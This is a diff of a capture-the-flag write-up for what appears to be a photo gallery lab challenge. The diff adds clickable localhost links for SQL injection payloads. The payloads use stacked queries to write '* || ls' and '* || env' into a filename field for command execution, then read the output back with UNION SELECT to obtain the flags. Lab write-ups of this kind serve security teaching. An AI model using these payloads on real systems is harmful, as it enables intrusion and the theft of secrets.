@@ -44,14 +44,20 @@ Successfully updated file title 3.
4444
4545Now we can update ** filename** to perform RCE.
4646
47+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1;UPDATE photos SET filename='* || ls > test' WHERE id=3;COMMIT;--] ( )
48+ 4749``` sql
4850id= 1 ;UPDATE photos SET filename= ' * || ls > test' WHERE id= 3 ;COMMIT ;--
4951```
5052
51- Visit ** INDEX** page to execute the command.
53+ Visit ** INDEX** http://127.0.0.1/xxxxxxxxxx/ page to execute the command.
54+ 55+ And then go check the execution result
56+ 57+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1.1 UNION SELECT 'test'--] ( )
5258
5359``` sql
54- id= 1 UNION SELECT ' test' --
60+ id= 1 . 1 UNION SELECT ' test' --
5561```
5662
5763Here we got ** ls** results in file ** test**
@@ -62,14 +68,20 @@ Dockerfile files main.py main.pyc prestart.sh requirements.txt test uwsgi.ini
6268
6369## 0x03 FLAG
6470
71+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1;UPDATE photos SET filename='* || env > test' WHERE id=3;COMMIT;--] ( )
72+ 6573``` sql
6674id= 1 ;UPDATE photos SET filename= ' * || env > test' WHERE id= 3 ;COMMIT ;--
6775```
6876
69- Visit ** INDEX** page to execute the command.
77+ Visit ** INDEX** http://127.0.0.1/xxxxxxxxxx/ page to execute the command.
78+ 79+ And then go get the flags
80+ 81+ [ http://127.0.0.1/xxxxxxxxxx/fetch?id=1.1 UNION SELECT 'test'--] ( )
7082
7183``` sql
72- id= 1 UNION SELECT ' test' --
84+ id= 1 . 1 UNION SELECT ' test' --
7385```
7486
7587Here we got all 3 flags in one place.
0 commit comments